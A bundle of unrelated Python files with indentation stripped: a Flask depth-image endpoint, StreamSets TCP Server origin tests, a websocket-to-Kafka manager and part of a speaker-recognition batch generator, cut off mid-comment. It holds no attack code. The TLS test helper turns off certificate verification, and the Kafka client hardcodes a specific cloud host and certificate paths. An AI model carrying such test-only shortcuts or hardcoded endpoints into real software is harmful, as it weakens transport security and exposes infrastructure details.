def get_depth_image():
# Get image from ros topic
depth_img_lock.acquire()
global depth_img
if depth_img is None:
depth_img_lock.release() # release the lock on the early-return path so it is not left held
return ''
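# Depth normalization for display (raw depth is assumed to be in millimeters):
# clip to the 400-1000 mm band, rescale to 0-255, and zero out saturated pixels so
# anything at or beyond 1000 mm (or with no valid reading) renders as black.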
depth_img_out = depth_img.astype(np.float32)
depth_img_out = np.clip(depth_img_out, 400, 1000) - 400
depth_img_out = depth_img_out / 600 * 255
depth_img_out = np.clip(depth_img_out, 0, 255)
depth_img_out[depth_img_out == 255] = 0
# depth_img_out /= 10
depth_img_out = depth_img_out.astype(np.uint8)
rv, buffer = cv2.imencode('.png', depth_img_out)
img_file = io.BytesIO(buffer)
rv = send_file(img_file, attachment_filename='depth.png', mimetype='image/png')
# cv2.imshow('depth', depth_img)
# cv2.waitKey(1000)
depth_img_lock.release()
return rv
if __name__ == '__main__':
app.run(port=5000)
|
test_tcp_server.py
|
# Copyright 2017 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import socket
import ssl
from collections import namedtuple
from threading import Thread
import pytest
from streamsets.testframework.environment import TCPClient
from streamsets.testframework.markers import sdc_min_version
logger = logging.getLogger(__name__)
# TODO: convert to pipeline param. seems to not work (see below)
TCP_PORT = 17892
TCP_SSL_FILE_PATH = './resources/tcp_server/file.txt'
# TCP keystore file path relative to $SDC_RESOURCES.
TCP_KEYSTORE_FILE_PATH = 'resources/tcp_server/keystore.jks'
@pytest.fixture(scope='module')
def tcp_server_pipeline(sdc_builder, sdc_executor):
"""Creates a pipeline with a TCP server origin using TEXT data with default separated records."""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server = pipeline_builder.add_stage('TCP Server')
tcp_server.configuration.update({'conf.dataFormat': 'TEXT',
# TODO: convert to param; this doesn't work
# 'conf.ports': ['${TCP_LISTEN_PORT}'],
'conf.ports': [str(TCP_PORT)],
'conf.tcpMode': 'DELIMITED_RECORDS',
'conf.recordProcessedAckMessage': 'record_${record:value(\'/text\')}'})
wiretap = pipeline_builder.add_wiretap()
tcp_server >> wiretap.destination
pipeline = pipeline_builder.build()
sdc_executor.add_pipeline(pipeline)
# Yield a namedtuple so that we can access instance names of the stages within the test.
yield namedtuple('Pipeline', ['pipeline', 'wiretap'])(pipeline, wiretap)
def test_tcp_server_simple(sdc_executor, tcp_server_pipeline):
"""Runs a test using the TCP server origin pipeline and asserts that the test record is created, with ack."""
# Start TCP Server pipeline.
expected_msg = 'hello_world'
sdc_executor.start_pipeline(tcp_server_pipeline.pipeline)
# create TCP client and send the data
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
# default separator is newline
record_ack1 = tcp_client.send_str_and_ack(f'{expected_msg}\n')
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline.pipeline, 'input_record_count', 1)
sdc_executor.stop_pipeline(tcp_server_pipeline.pipeline)
read_data = tcp_server_pipeline.wiretap.output_records
assert len(read_data) == 1
assert read_data[0].field['text'].value == expected_msg
assert record_ack1 == f'record_{expected_msg}'
# SDC-10425
@sdc_min_version('3.0.0.0') # Need the delay processor
def test_stop_tcp_with_delay(sdc_builder, sdc_executor):
"""Make sure that the origin can properly be started after stopping it with long batch times."""
builder = sdc_builder.get_pipeline_builder()
message = 'Something not important'
tcp_server = builder.add_stage('TCP Server')
tcp_server.configuration.update({'conf.dataFormat': 'TEXT',
'conf.ports': [str(TCP_PORT)],
'conf.tcpMode': 'DELIMITED_RECORDS',
'conf.recordProcessedAckMessage': 'record_${record:value(\'/text\')}'})
# Make sure that each batch takes at least 5 seconds
delay = builder.add_stage('Delay')
delay.delay_between_batches = 5 * 1000
wiretap = builder.add_wiretap()
tcp_server >> delay >> wiretap.destination
pipeline = builder.build()
sdc_executor.add_pipeline(pipeline)
# Let's start/stop the pipeline few times, it should always properly wait for graceful shutdown and subsequent
# start of pipeline should be immediate.
for _ in range(3):
wiretap.reset()
# Start the pipeline
sdc_executor.start_pipeline(pipeline)
# Send exactly one record
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
tcp_client.send_str_and_ack(message + '\n')
# Wait until at least 1 record is processed
sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 1)
sdc_executor.stop_pipeline(pipeline)
assert len(wiretap.output_records) == 1
assert [message] == [record.field['text'] for record in wiretap.output_records]
@sdc_min_version('3.7.0')
def test_tcp_server_read_timeout(sdc_builder, sdc_executor):
"""Runs a test using TCP Server Origin and setting Read Timeout to 20 seconds.
Then checks connection is automatically closed after 20 seconds as the timeout is triggered.
As the destination is not relevant for this stage the pipeline looks like:
TCP Server >> wiretap
"""
expected_message = 'testMessage'
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(TCP_PORT)],
tcp_mode='DELIMITED_RECORDS',
data_format='TEXT',
read_timeout_in_seconds=20)
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(title='TCP Server Origin Read Timeout')
sdc_executor.add_pipeline(tcp_server_pipeline)
sdc_executor.start_pipeline(tcp_server_pipeline)
# Send message to test connection is open.
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
tcp_client.send_str_and_ack(expected_message + '\n')
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 1)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records = [record.field['text'] for record in wiretap.output_records]
assert len(output_records) == 1
assert expected_message == output_records[0]
def test_tcp_server_multiple_messages(sdc_builder, sdc_executor):
"""Runs a test using 4 pipelines with the TCP Server Origin writing to wiretap and checking all records sent by the
client are correctly received by the TCP Server Origin. Pipeline configurations are:
1) No record_processed_ack_message and No batch_completed_ack_message
2) record_processed_ack_message and No batch_completed_ack_message
3) No record_processed_ack_message and batch_completed_ack_message
4) record_processed_ack_message and batch_completed_ack_message
All pipelines look like below but with different configuration as explained above:
TCP Server >> wiretap
"""
# Build and test pipeline number 1.
tcp_server_pipeline_1, wiretap_1 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=False, batch_ack=False)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_1, wiretap_1)
# Build and test pipeline number 2.
    tcp_server_pipeline_2, wiretap_2 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=True, batch_ack=False)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_2, wiretap_2)
# Build and test pipeline number 3.
tcp_server_pipeline_3, wiretap_3 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=False,
batch_ack=True)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_3, wiretap_3)
# Build and test pipeline number 4.
tcp_server_pipeline_4, wiretap_4 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=True,
batch_ack=True)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_4, wiretap_4)
@sdc_min_version('3.4.2')
def test_tcp_server_ssl(sdc_builder, sdc_executor):
"""Runs a test using the TCP server origin pipeline with Enable TLS set and asserts that the file is received"""
expected_msg = _get_expected_message(TCP_SSL_FILE_PATH)
# Start TCP server pipeline.
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server = pipeline_builder.add_stage('TCP Server')
tcp_server.set_attributes(data_format='TEXT',
port=[str(TCP_PORT)],
tcp_mode='DELIMITED_RECORDS',
use_tls=True,
keystore_file=TCP_KEYSTORE_FILE_PATH,
keystore_type='JKS',
keystore_password='password',
keystore_key_algorithm='SunX509',
use_default_protocols=True,
use_default_cipher_suites=True)
wiretap = pipeline_builder.add_wiretap()
tcp_server >> wiretap.destination
tcp_server_ssl_pipeline = pipeline_builder.build(title='TCP Server SSL pipeline')
sdc_executor.add_pipeline(tcp_server_ssl_pipeline)
sdc_executor.start_pipeline(tcp_server_ssl_pipeline)
    # Send the data twice. Even though batch_size = 2, 2 batches are created (1 for each connection).
_send_tcp_ssl_file(sdc_executor)
_send_tcp_ssl_file(sdc_executor)
sdc_executor.wait_for_pipeline_metric(tcp_server_ssl_pipeline, 'input_record_count', 2)
sdc_executor.stop_pipeline(tcp_server_ssl_pipeline)
# Verify the results. First check number of batches received is 2.
history = sdc_executor.get_pipeline_history(tcp_server_ssl_pipeline)
assert history.latest.metrics.counter('pipeline.batchCount.counter').count == 2
# Then check last batch received in wiretap contains the expected message.
assert len(wiretap.output_records) == 2
assert str(wiretap.output_records[0].field['text']) in expected_msg.decode("utf-8")
assert str(wiretap.output_records[1].field['text']) in expected_msg.decode("utf-8")
def test_tcp_multiple_ports(sdc_builder, sdc_executor):
""" Runs a test using TCP Server as Origin and Trash as destination. TCP Server will be listening to ports 55555 and
44444. Two clients will be writing in parallel to one of these ports (each client to a different port). While
clients are writing it will be checked no exception is thrown due to TCP Server pool exhausted.
Pipeline looks like:
TCP Server >> trash
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(55555), str(44444)],
number_of_receiver_threads=5,
tcp_mode='DELIMITED_RECORDS',
max_batch_size_in_messages=100,
batch_wait_time_in_ms=6000,
max_message_size_in_bytes=40960,
data_format='TEXT',
max_line_length=10240)
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
    tcp_server_pipeline = pipeline_builder.build(title='TCP Server Origin 5 threads 2 ports')
sdc_executor.add_pipeline(tcp_server_pipeline)
# Run pipeline.
sdc_executor.start_pipeline(tcp_server_pipeline)
expected_message = 'hello_world'
total_num_messages = 0
message_counter = 0
expected_messages_list = []
# Create tcp client listening to port 55555.
tcp_client_socket_port_55555 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_socket_port_55555.connect((sdc_executor.server_host, 55555))
# Create tcp client listening to port 44444.
tcp_client_socket_port_44444 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_socket_port_44444.connect((sdc_executor.server_host, 44444))
# Send messages for both tcp clients.
for _ in range(0, 1000):
expected_message_bytes = bytes(f'{message_counter}{expected_message}\n', 'utf-8')
_send_asynchronous_message_multiple_clients([tcp_client_socket_port_55555, tcp_client_socket_port_44444],
expected_message_bytes)
        # Append the message to the list twice, as both clients send the message.
expected_messages_list.append(f'{message_counter}{expected_message}')
expected_messages_list.append(f'{message_counter}{expected_message}')
message_counter += 1
total_num_messages += 2
# Close clients.
tcp_client_socket_port_55555.close()
tcp_client_socket_port_44444.close()
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 1000)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records_values = [str(record.field['text']) for record in wiretap.output_records]
assert len(output_records_values) == total_num_messages
assert sorted(output_records_values) == sorted(expected_messages_list)
def test_tcp_epoll_enabled(sdc_builder, sdc_executor):
""" Run a pipeline with TCP Server Origin having Epoll Enabled as well as setting number of threads to 5 and
validate it correctly starts and receives data from a client.
Pipeline looks like:
TCP Server >> wiretap
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(TCP_PORT)],
number_of_receiver_threads=5,
enable_native_transports_in_epoll=True,
tcp_mode='DELIMITED_RECORDS',
max_batch_size_in_messages=1000,
batch_wait_time_in_ms=6000,
max_message_size_in_bytes=40960,
data_format='TEXT',
max_line_length=10240)
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(title='TCP Server Origin 5 threads 1 port Epoll Enabled')
sdc_executor.add_pipeline(tcp_server_pipeline)
# Run pipeline.
sdc_executor.start_pipeline(tcp_server_pipeline)
expected_message = 'hello_world'
total_num_messages = 0
expected_messages_list = []
# Create tcp client.
tcp_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_socket.connect((sdc_executor.server_host, TCP_PORT))
# Send messages for this tcp client.
for _ in range(0, 500):
message = f'{total_num_messages}_{expected_message}'
tcp_client_socket.sendall(bytes(message + '\n', 'utf-8'))
expected_messages_list.append(message)
total_num_messages += 1
tcp_client_socket.close()
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 500)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records_values = [str(record.field['text']) for record in wiretap.output_records]
assert len(output_records_values) == total_num_messages
assert sorted(output_records_values) == sorted(expected_messages_list)
def _send_asynchronous_message_multiple_clients(client_socket_list, message_bytes):
""" Sends message_bytes for each client in client_socket_list
:param client_socket_list: The list of TCP client sockets
:param message_bytes: the bytes of the message to send
"""
threads_list = []
for client_socket in client_socket_list:
thread = Thread(target=_send_synchronous_message, args=(client_socket, message_bytes))
threads_list.append(thread)
thread.start()
for thread in threads_list:
thread.join()
def _send_synchronous_message(client_socket, message_bytes):
client_socket.sendall(message_bytes)
def _send_tcp_ssl_file(sdc_executor):
"""Sends a file through tcp using ssl"""
hostname = sdc_executor.server_host
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with socket.create_connection((hostname, TCP_PORT)) as sock:
with context.wrap_socket(sock, server_hostname=hostname) as ssock:
            with open(TCP_SSL_FILE_PATH, 'rb') as file_to_send:
                ssock.sendfile(file_to_send)
def _get_expected_message(file_path):
    with open(file_path, 'rb') as file_to_read:
        return file_to_read.readline()
def _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor, record_ack, batch_ack):
"""Add a TCP Server to Trash pipeline to the given sdc_executor setting a record ack if record_ack is true or
setting a batch ack batch_ack is true.
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(TCP_PORT)],
tcp_mode='DELIMITED_RECORDS',
data_format='TEXT')
if record_ack:
tcp_server_stage.set_attributes(record_processed_ack_message='Record Processed')
if batch_ack:
tcp_server_stage.set_attributes(batch_completed_ack_message='Batch Completed')
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(
title=f'TCP Server Origin {"with record ack" if record_ack else "no record ack"} '
f'{"and batch ack" if batch_ack else "and no batch ack"}')
sdc_executor.add_pipeline(tcp_server_pipeline)
return [tcp_server_pipeline, wiretap]
def _run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline, wiretap):
""" Runs the given tcp_server_pipeline and sends num_messages_by_client messages for each client where each
position in num_messages_by_client indicates the number of messages to send for the next client, for example: first
client will send num_messages_by_client[0] messages and so on. The number of clients is num_clients, therefore
num_clients must be equal to len(num_messages_by_client). After that it stops the pipeline and checks that the
number of messages received by the pipeline is the same as the sum of number of messages sent by each the client.
seconds_to_wait_before_close indicates the number of seconds to wait before closing for each client. If
seconds_to_wait_before_close is zero then there is no wait for that client. seconds_to_wait_before_close[0]
indicates the time to wait for first client and so on.
"""
message = 'hello world'
# Run pipeline.
sdc_executor.start_pipeline(tcp_server_pipeline)
# Process each client.
for _ in range(0, 3):
# Create tcp client.
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
# Send messages for this tcp client.
tcp_client.send_str_and_ack(message + '\n')
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 3)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records_values = [str(record.field['text']) for record in wiretap.output_records]
assert len(output_records_values) == 3
assert output_records_values == 3 * [message]
|
websocket_manager.py
|
import json
import time
from threading import Thread, Lock
from queue import Queue
from typing import Callable
from gzip import decompress
from websocket import WebSocketApp
from confluent_kafka import Producer
class WebsocketManager():
_CONNECT_TIMEOUT_S = 5
def __init__(self, url: str, subscribe: Callable, unsubscribe: Callable):
"""
subscribe is a function that's called right after the websocket connects.
unsubscribe is a function that's called just before the websocket disconnects.
both subscribe and unsubscribe MUST have one argument, which is an instance of
WebsocketManager (see KrakenWsManagerFactory in ws_factories.py for an example).
"""
self.connect_lock = Lock()
self.ws = None
self.queue = Queue()
self.url = url
self.subscribe = subscribe
self.unsubscribe = unsubscribe
self.connect()
conf = {
'bootstrap.servers': 'SSL://kafka-16054d72-gda-3ad8.aivencloud.com:18921',
'security.protocol' : 'SSL',
'client.id': 'kafka-python-producer',
'ssl.certificate.location': '../../jay.cert',
'ssl.key.location': '../../jay.key',
'ssl.ca.location': '../../ca-aiven-cert.pem',
}
self.producer = Producer(conf)
def _acked(self, err, msg):
if err is not None:
print("Failed to deliver message: {}".format(err))
else:
#delivered_records += 1
print("Produced record to topic {} partition [{}] @ offset {}"
.format(msg.topic(), msg.partition(), msg.offset()))
def get_msg(self):
"""
Retrieves a message from the front of the queue.
        NOTE: The message received has an extra field "receive_timestamp", which
is the UTC timestamp of when the message was received in milliseconds.
"""
return self.queue.get()
def _on_message(self, ws, message):
message = json.loads(decompress(message))
if isinstance(message, dict):
message["receive_timestamp"] = int(time.time()*10**3)
try:
self.producer.produce(f"test-huobi-raw", value=json.dumps(message), on_delivery=self._acked)
self.producer.poll(0)
except Exception as e:
print("An error occurred while producing: %s" % e)
def get_q_size(self):
"""Returns the size of the queue"""
print(f"Queue Backlog: {self.queue.qsize()}")
def send(self, message):
"""Sends a message over the websocket"""
self.connect()
self.ws.send(message)
def send_json(self, message):
"""Sends a json message over the websocket"""
self.send(json.dumps(message))
def _connect(self):
"""Creates a websocket app and connects"""
assert not self.ws, "ws should be closed before attempting to connect"
self.ws = WebSocketApp(
self.url,
on_message=self._wrap_callback(self._on_message),
on_close=self._wrap_callback(self._on_close),
on_error=self._wrap_callback(self._on_error),
)
wst = Thread(target=self._run_websocket, args=(self.ws,))
wst.daemon = True
wst.start()
# Wait for socket to connect
ts = time.time()
while self.ws and (not self.ws.sock or not self.ws.sock.connected):
if time.time() - ts > self._CONNECT_TIMEOUT_S:
self.ws = None
raise Exception(
f"Failed to connect to websocket url {self._get_url()}")
time.sleep(0.1)
def _wrap_callback(self, f):
"""Wrap websocket callback"""
def wrapped_f(ws, *args, **kwargs):
if ws is self.ws:
try:
f(ws, *args, **kwargs)
except Exception as e:
raise Exception(f'Error running websocket callback: {e}')
return wrapped_f
def _run_websocket(self, ws):
""""Runs the websocket app"""
try:
ws.run_forever(ping_interval=30)
except Exception as e:
raise Exception(f'Unexpected error while running websocket: {e}')
finally:
pass
# self._reconnect(ws)
def _reconnect(self, ws):
"""Closes a connection and attempts to reconnect"""
assert ws is not None, '_reconnect should only be called with an existing ws'
if ws is self.ws:
self.ws = None
ws.close()
self.connect()
def connect(self):
"""Connects to the websocket"""
if self.ws:
return
with self.connect_lock:
while not self.ws:
self._connect()
if self.ws:
self.subscribe(self)
return
def resubscribe(self):
        self.unsubscribe(self)
        self.subscribe(self)
def _on_close(self, ws, a, b):
print("Connection Closed")
self.unsubscribe(self)
self._reconnect(ws)
def _on_error(self, ws, error):
print(f"websocket error: {error}")
self._reconnect(ws)
def reconnect(self) -> None:
if self.ws is not None:
self._reconnect(self.ws)
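# ----------------------------------------------------------------------------
# Usage sketch (added for illustration, not part of the original module).
# The subscribe/unsubscribe callbacks each receive the WebsocketManager
# instance and typically send the exchange-specific (un)subscribe frames.
# The URL and channel name below are placeholders, not real endpoints.
def _example_subscribe(manager):
    # Hypothetical subscription frame; adjust to the target exchange's API.
    manager.send_json({"sub": "market.btcusdt.trade.detail", "id": "example"})
def _example_unsubscribe(manager):
    manager.send_json({"unsub": "market.btcusdt.trade.detail", "id": "example"})
if __name__ == "__main__":
    # Guarded example: constructing the manager connects to the websocket and
    # creates the Kafka producer, so it needs network access and valid certs.
    manager = WebsocketManager("wss://example.invalid/ws", _example_subscribe, _example_unsubscribe)
    while True:
        time.sleep(60)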
|
mbatch_generation.py
|
# Code for generating mini-batches. The output can be any
# combination of:
# features/0-stats/1-stats/i-vectors/labels/scp-indices
#
# scp-indices means which position in the scp the data had. This
# can for example be used for looking up a trial weight
# from a list or for accessing data that is already
# loaded to the GPU.
#
# There are three different generators:
#
# gen_mbatch_spk_all_utts:
# Generates minibatches that each contains all the utterances
# from a small set of speakers. The batch size is controlled
# by setting "max_spk_per_batch" and "max_utt_per_batch".
# The order of speakers is determined by a function,
# "randomize_spk_id_order", which
# will be called before the training starts as well as after
# all speakers in the training set have been used. This function
# can be provided by the user. For example, it can be a function
# that simply randomizes the speakers. But we could also consider
# making a function that puts e.g. 10 "similar" speakers
# consecutively and sets max_spk_per_batch=10 to get them in the same
# batch.
# gen_mbatch_utt_groups
# This generator gives batches according to a list of "utterance groups"
# A function that generate the utterance groups needs to be provided.
# This function will be called before the training starts as well as
# after all data have been used so that it can be re-shuffled (or re-ordered
# according to some other rule)
# Assuming it gives [g1, g2,...] where gi is a group of utterances, e.g.,
# g1 = [u11, u12, u13,...]
# The generator has three options to form mini-batches.
# 1, "diag": Minibatches are (g1 - g1), (g2 - g2), (g3 - g3),...
# 2, "rowwise": Minibatches are (g1 - g1), (g1 - g2), (g1 - g3),...,(g2 - g2), (g2 - g3)..., (g3 - g3)
# All possible batches are looped through in order. Advantage: one uses the data more per
# copy to the GPU (BUT THIS REMAINS TO BE IMPLEMENTED).
# Disadvantage: consecutive batches, e.g. (g1 - g1) and (g1 - g2), are more statistically dependent.
# 3, "random": Minibatches are (gi - gj),... Indices "i" and "j" are generated randomly until all
# possible batches have been used
#
# gen_mbatch_trials --NOT IMPLEMENTED YET--
# Will take a list of (difficult) trials and divide into batches.
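#
# Illustrative example (added for clarity): with three utterance groups
# [g0, g1, g2], both "rowwise" and "random" enumerate the upper-triangular
# index pairs produced by np.triu_indices(3):
#   i_ind = [0, 0, 0, 1, 1, 2], j_ind = [0, 1, 2, 1, 2, 2]
# i.e. the batches (g0-g0), (g0-g1), (g0-g2), (g1-g1), (g1-g2), (g2-g2).
# "random" visits the same pairs in shuffled order, while "diag" only uses
# the pairs with i == j.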
from utils.misc import get_logger
log = get_logger()
import h5py, os, time
from pympler.asizeof import asizeof
import sys
import numpy as np
import threading
########################################################################################
### General functions for processing the scp, loading data, etc.
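# get_hard_impostor_info expects one trial per line with six space-separated
# fields: "<spk1> <spk2> <utt1> <utt2> <score> <label>". A hypothetical line
# (names and score are made up for illustration) could look like:
#   spk0012 spk0345 spk0012-utt3 spk0345-utt7 12.41 nontarget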
def get_hard_impostor_info(scp, n_scores=None):
#print("e")
spk2hardImpID = {}
spk2hardImpScr = {}
try:
with open(scp, 'r') as f:
for line in f:
spk1, spk2, utt1, utt2, scr, lab = line.rstrip().split(" ")
if spk1 in spk2hardImpID:
spk2hardImpID[spk1].append( spk2 )
spk2hardImpScr[spk1].append( float(scr) )
else:
spk2hardImpID[spk1] = [ spk2 ]
spk2hardImpScr[spk1] = [ float(scr) ]
if spk2 in spk2hardImpID:
spk2hardImpID[spk2].append( spk1 )
spk2hardImpScr[spk2].append( float(scr) )
else:
spk2hardImpID[spk2] = [ spk1 ]
spk2hardImpScr[spk2] = [ float(scr) ]
except:
print("Could not read %s".format(scp) )
sys.exit(1)
# Sort according to scores
for spk in spk2hardImpID.keys():
sort_idx = np.flip( np.argsort(spk2hardImpScr[spk]) ) # flip is for getting descending sort
sort_scr = [spk2hardImpScr[spk][i] for i in sort_idx[:n_scores] ]
sort_id = [spk2hardImpID[spk][i] for i in sort_idx[:n_scores] ]
spk2hardImpScr[spk] = sort_scr
spk2hardImpID[spk] = sort_id
return spk2hardImpScr, spk2hardImpID
####
# Gathers speaker info from an scp.
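# Each scp line is expected to have 3 or 4 space-separated columns:
#   <spk_id> <file_id> <path/to/file.ark:offset> [<side_info, colon-separated ints>]
# A hypothetical example line (paths made up for illustration):
#   spk0012 spk0012-utt3 /data/feats/raw_mfcc.1.ark:2041 0:250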
def get_kaldi_scp_info( scp, spk_name_old = [] ):
print("Processing data info in" + scp )
utt2file = []
utt2fid = []
spk_ids = []
utt2sideInfo = []
scpInd = 0
ark_files = {}
utt2scpInd = []
fid2file = {}
f = open(scp, 'r')
for line in f:
scp_info = line.rstrip().split(" ")
n_scp_col = len(scp_info)
spk_id = scp_info[0]
f_id = scp_info[1]
f_name = scp_info[2]
fid2file[f_id] = f_name
utt2fid.append(f_id)
spk_ids.append( spk_id )
utt2file.append( f_name )
if ( len(scp_info) ==4 ):
s = scp_info[3].split(":")
utt2sideInfo.append( [int(ss) for ss in s] )
ark_files[ f_name.split(":")[0] ] = 1
utt2scpInd.append(scpInd)
scpInd += 1
n_ark_not_found = 0
for k in ark_files.keys():
if ( not os.path.isfile( k ) ):
log.warning( "WARNING: %s doesn't exist", k )
n_ark_not_found += 1
if ( n_ark_not_found > 0 ):
log.warning("WARNING: A total of ark files were not found." % str( n_ark_not_found ) )
f.close()
if (len(spk_name_old) == 0):
[ spk_name, utt2spk, spk_counts ] = np.unique( spk_ids, return_inverse=True, return_counts=True )
else:
log.info("Using OLD spkID_2_spk_name")
[ spk_name_tmp, utt2spk, spk_counts_tmp ] = np.unique( spk_ids, return_inverse=True, return_counts=True )
log.info( "#spk in this scp: %d", len(spk_name_tmp) )
log.info( "#spk in old scp: %d", len(spk_name_old) )
spk_name_to_spk_id_old = {}
for i,n in enumerate( spk_name_old ):
spk_name_to_spk_id_old[n]=i
new_spk_to_old_spk = [spk_name_to_spk_id_old[n] for n in spk_name_tmp]
spk_name = spk_name_old
for i in range(len(utt2spk)):
utt2spk[i] = new_spk_to_old_spk[ utt2spk[i] ]
spk_counts = np.zeros( len(spk_name_old) )
for i in range(len( spk_counts_tmp )):
spk_counts[ new_spk_to_old_spk[i] ] = spk_counts_tmp[i]
assert(np.sum(spk_counts) == np.sum(spk_counts_tmp) )
log.info("#utts: %d", len(utt2spk) )
log.info("Min spk id: %d, Max spk id: %d" % (np.min(utt2spk), np.max(utt2spk)))
print("Processed " + str(scpInd) + " scp entries")
print("Found " + str(len(utt2spk)) + " utterances and " + str(len(spk_name)) + " speakers.")
    # Create the scp info dictionary. Note that other scripts may produce an additional entry
# called 'utt2scpInd'. See comment there.
scp_info = { 'spk_name' : spk_name, 'utt2spk' : utt2spk,
'spk_counts' : spk_counts, 'utt2file' : utt2file,
'utt2scpInd' : utt2scpInd, 'utt2sideInfo' : utt2sideInfo,
'utt2fid': utt2fid, 'fid2file':fid2file }
return scp_info
###
# Function for loading 0th and/or 1st order stats
def load_stats(stats_dir, files, stats_order):
first = True
for f in files:
try:
with h5py.File(stats_dir + '/' + f + '.h5', 'r', driver='core') as fh:
if (stats_order == 0):
if ( first ):
stats = np.array(fh['N'])[None,:]
first = False
else:
stats = np.concatenate((stats, np.array(fh['N'])[None,:]))
elif (stats_order == 1):
if ( first ):
stats = np.array(fh['F'])
first = False
else:
stats = np.concatenate((stats, np.array(fh['F'])))
elif (stats_order == 2):
if ( first ):
stats0 = np.array(fh['N'])[None,:]
stats1 = np.array(fh['F'])
first = False
else:
stats0 = np.concatenate((stats0, np.array(fh['N'])[None,:]))
stats1 = np.concatenate((stats1, np.array(fh['F'])))
except IOError:
raise Exception("Cannot open stats file [%s] for reading" % f)
if (stats_order ==2 ):
return [stats0, stats1]
else:
return [stats]
########################################################################################
# Functions for arranging speakar IDs. The batch generator
# will call one of these functions whenever the whole data
# set has been looped through.
def keep_spk_id_order(spk_name):
print("The order of speaker IDs will not be changed")
n_spk = len(spk_name)
return np.arange(0, n_spk)
def randomize_spk_id_order(spk_name, seed=123):
rng = np.random.RandomState(seed)
n_spk = len(spk_name)
spk_id = rng.permutation(list(range(0, n_spk))) # Randomize the numbers from 0 to N - 1
print("The order of the speaker IDs has been randomized with seed" + str(seed))
return spk_id
# This generator gives batches with all utterances from
# some speakers.
# ivec_dir, stats_dir, feat_dir should be either a path or None.
# If None, this data will not be loaded.
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
def gen_mbatch_spk_all_utts(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
max_spk_per_batch=10, max_utt_per_batch=300,
y_function=None, verbose=False, allow_roll_over=False,
arrange_spk_fcn=keep_spk_id_order, output_labs=True, output_scp_ind=False, output_utt_id=False):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
# Number of speakers
n_spk = len( spk_counts )
i = 0 # Minibatch index
j = 0 # Speaker index
while True:
# For checking the time to create the batch
if (verbose):
start_time = time.time()
# If we have used the last data of our training set,
# we rearrange the speaker IDs.
        # Note: This will happen regardless of the value of allow_roll_over
if ( j == 0 or spk_indices_batch[0] > spk_indices_batch[-1]):
print("Order the speakers")
spk_ids = arrange_spk_fcn( spk_name )
finish_set = False
# Set the indices for the batch. We will add 1 speaker
# until we reach the desired number of speakers or the
# maximum number of utterance per batch limit
n_spk_batch = 0 # Number of speaker in the batch
n_utts_batch = 0 # Number of utterances in the batch
spk_indices_batch = [] # The speaker indices we will use
to_many_speakers = False
to_many_utterances = False
finish_set = False
while not ((to_many_speakers) or (to_many_utterances) or (finish_set)):
n_utts_batch += spk_counts[ spk_ids[ j ] ]
n_spk_batch += 1
spk_indices_batch.append( j )
# Increase the spk index. The modulo is to start over from the
